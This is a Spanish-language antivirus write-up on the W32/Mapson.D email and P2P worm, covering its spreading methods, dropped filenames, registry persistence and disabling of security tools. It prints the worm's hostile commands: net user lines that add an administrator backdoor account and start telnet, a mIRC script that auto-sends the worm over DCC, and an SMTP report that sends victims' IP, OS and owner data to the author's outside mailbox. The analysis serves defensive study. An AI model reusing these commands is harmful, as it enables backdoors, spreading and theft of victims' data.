Nombre    :   W32/Mapson.D
Autor     :   Falckon
Origen    :   Mexico
Tamao    :   179 KB
Binario   :   Binarios\I-Worm.Mapson.D.Zip

Alias     :   W32/Mapson.D@mm, I.worm.Mapson.D@mm 

Mapson.D es un gusano de alta propagacin masiva a travs de mensajes de correo con Asuntos, Contenidos y archivos Anexados, elegidos en forma aleatoria. 

Se difunde adems va la mayora de redes Peer to Peer, MSN Messenger, el ICQ, redes con recursos compartidos y el IRC (Internet Chat Relay). Adems reporta a su autor informacin de las infecciones que realiza.

Como en sus versiones anteriores deshabilita antivirus, firewalls y sistemas de control.

El gusano infecta Windows 95/98/NT/Me/2000/XP, incluyendo los servidores NT/2000/Server 2003, est desarrollado en Borland Delphi, tiene 180 KB de extensin y comprimido con el utilitario UPX (Ultimate Packer for eXecutables):

http://upx.sourceforge.net

Para auto-enviarse masivamente por correo a todos los buzones de correo de la Libreta de Direcciones de MS Outlook y a la Libreta Global de Windows WAB (Windows Address Book), emplea el componente TNMSMTP de FastNeT Tools para los lenguajes de programacin de Borland.

Adicionalmente busca las cuentas de correo del MSN Messenger en las siguientes llaves de registro:

[Software\Microsoft\MessengerService\ListCache\.NET Messenger Service] 
[Software\Microsoft\MSNMessenger\ListCache\.NET Messenger Service] 

Los mensajes tienen las siguientes caractersticas:

Remitente, emplea la tcnica Email spoofing, que disfraza las verdaderas direcciones de los Remitentes. Asimismo usa las direcciones extradas del sistema infectado  alternativamente usa la direccin electrnica virus@viruses.com 

Anexado, cualquiera de los siguientes:

Q832645.exe 
newmail.scr 
privacidad.pif 
cuentashotmail.pif 
www.huevosymashuevos.com 
extreme.pif 
vulnerabildades.pif 
playa_cancun.pif 
avergara.scr 
britney.scr 
www.vsantivirus.com 
engrupo.pif 
disfuncion.pif 
orgasmo.pif 
Anti-Blaster.exe 
pareja.pif 
antirundll.exe 
sharekaza.exe 
nuevovirus.txt.pif 
kamasutra.pif 
parejaideal.pif 
amores.pif 
chicas.pif 
Hacker-Bible.pif 
viruses.pif 
K54403.exe 
microsoft@microsoftupdate.com 
mailcrack.bat 
virus-list.pif 
virus-faq.pif 
animaciones.pif 
posiciones.exe 
confidencial.pif 
readme.pif 
muy-interesante.pif 
confidential-information.pif 
juan@ivan-ich.com 
JuegoconlosMuertos.pif 
sexual-positions.bat 
foto-alemania.pif 
lovecard.bat 
consejos-mujeres.bat 
chica-sex.scr 
hotmailhacker.exe 
hackwebs.exe 
hotmailhack.pif 
generatorviruses.exe 
shakira.scr 
girlpic.pif 
Anti-BlasterWorm.exe 
MatrixReloaded.scr 
Paulina-rubio-cameron-diaz.scr 
Drivers-Windows.exe  

Al ejecutar el archivo infectado el gusano se copia al directorio raz como C:\Falckon.vxd y a la carpeta %System% con los siguientes nombres:

privacidad.pif 
cuentashotmail.pif 
extreme.pif 
vulnerabildades.pif 
playa_cancun.pif 
avergara.scr 
britney.scr 
engrupo.pif 
disfuncion.pif 
orgasmo.pif 
Anti-Blaster.exe 
pareja.pif 
sharekaza.exe 
kamasutra.pif 
parejaideal.pif 
amores.pif 
chicas.pif 
Hacker-Bible.pif 
viruses.pif 
mailcrack.bat 
animaciones.pif 
posiciones.exe 
confidencial.pif 
readme.pif 
muy-interesante.pif 
juan@ivan-ich.com 
JuegoconlosMuertos.pif 
sexual-positions.bat 
foto-alemania.pif 
lovecard.bat 
consejos-mujeres.bat 
chica-sex.scr 
hotmailhacker.exe 
hackwebs.exe 
hotmailhack.pif 
generatorviruses.exe 
shakira.scr 
girlpic.pif 
Anti-BlasterWorm.exe 
MatrixReloaded.scr 
Paulina-rubio-cameron-diaz.scr 
Drivers-Windows.exe 
contraseas.pif 

Para ejecutarse la prxima vez que se inicie el sistema, el gusano crea la siguiente llave de registro:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"NAV" = "%System%\rundll32.exe"

%System% es la variable C:\Windows\System para Windows 95/98/Me, C:\Winnt\System32 para Windows NT/2000 y C:\Windows\System32 para Windows XP y Windows Server 2003.

Asimismo, Mapson.D se copia a las siguientes rutas:

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ 
C:\Windows\Start Menu\Programs\Startup\ 
C:\Windows\Men inicio\Programas\Inicio\ 
C:\WINNT\Profiles\All Users\Start Menu\Programs\Startup\ 
C:\autoexec.bat 

Para infectar a travs de las redes Peer to Peer, el gusano se auto-copia a las carpetas: 

\KaZaA\My Shared Folder 
\edonkey2000\incoming 
\gnucleus\downloads 
\icq\shared files 
\kazaa lite\My Shared Folder 
\limewire\shared\ 
\morpheus\my shared folder 
\Grokster\My Grokster 
\WinMX\My Shared Folder 
\Tesla\Files 
\Overnet\Incoming 
\XoloX\Downloads 
\Rapigator\Share 
\KMD\My Shared Folder  

Con los siguientes nombres:

Kazaa Media Desktop.exe 
AOL Instant Messenger.exe 
ICQ ro 2003a beta.exe 
Download Accelerator plus.exe 
ZoneAlarm.exe 
DivX Video Bundle.exe 
RealOne Free Player.exe 
Adobe Acrobat Reader.exe 
JetAudio Basic.exe 
WS_FT.exe 
Registry Mechanic.exe 
MSN Messenger.exe 
Biromsoft WebCam.exe 
Nero Burning ROM.exe 
Microsoft Windows Media Player.exe 
Sybot.exe 
Copernic Agent.exe 
Diet Kazaa.exe 
SolSuite 2003.exe 
pop-Up Stoper.exe 
QuickTime.exe 
XoloX Ultra.exe 
Microsoft Internet Exlorer.exe 
Network Cable e ADSL Speed.exe 
Kazaa Download Accelerator.exe 
Global DiVX layer.exe 
DirectDVD.exe 
Kasersky Antivirus.exe 
PerAntivirus.exe 
Norton Antivirus.exe 
Panda Antivirus.exe 
McAfee Antivirus.exe 
Microsoft Office XP.exe 
Microsoft Windows 2003.exe 
Office 2003.exe 
Visual Studio Net.exe 
Matrix Movie.exe 
Virtual Girl.exe 
FireWorks 4.exe 
FIreWorks MX.exe  

Para difundirse por el IRC (Internet Chat Relay) el gusano modifica el SCRIPT.INI del software mIRC con las siguientes lneas cifradas:

n0=On 1:JOIN:#:{/if ( $nick == $me) { halt } | .privmsg $nick 
| /dcc Send -c $nick 

En Windows NT/2000/XP  Server 2003, el gusano crea un usuario con privilegios de Administrador con las siguientes instrucciones:

cmd.exe /c net user GEDZAC gedzac /add 
cmd.exe /c net localgroup "Administrators" GEDZAC /add 
cmd.exe /c net start "telnet"  
Este gusano emplea su propio SMTP (Simple Mail Transfer Protocol) para enviar un correo al autor del virus cada vez que una PC infectada se conecta a Internet, usando las siguientes instrucciones:

smtp.prodigy.net.mx 
Helo localhost 
MAIL FROM: ajh@prodigy.net.mx 
RCPT TO: infectados@virusmex.zzn.com 
FROM: Falckon@GEDZAC.net 
To: infectados@virusmex.zzn.com 
Subject: New Infected 
Mapson.D Reporting to the GEDZAC LABs 
Infection Date: 
Infection Time: 
ICountry: 
Registered Org: 
Reg. Onwer: 
OS: 
IP: 
[GEDZAC LABS] 

Dentro del cdigo del virus se puede leer el siguiente texto:

Thx to All my VX Friends specially SlageHammer VirusBstr Positron 
VB : Thx for the GhostApp Component :D 
Slage : Thx for the 5 msgs to my worm :D and ur counsels 
Positron: to ur SMTP engine 0.9 i study and learn sockets :D 
Thx to All 
Mabel i love u :P 

Mapson.D Created by Falckon/GEDZAC THE FINAL VERSION 
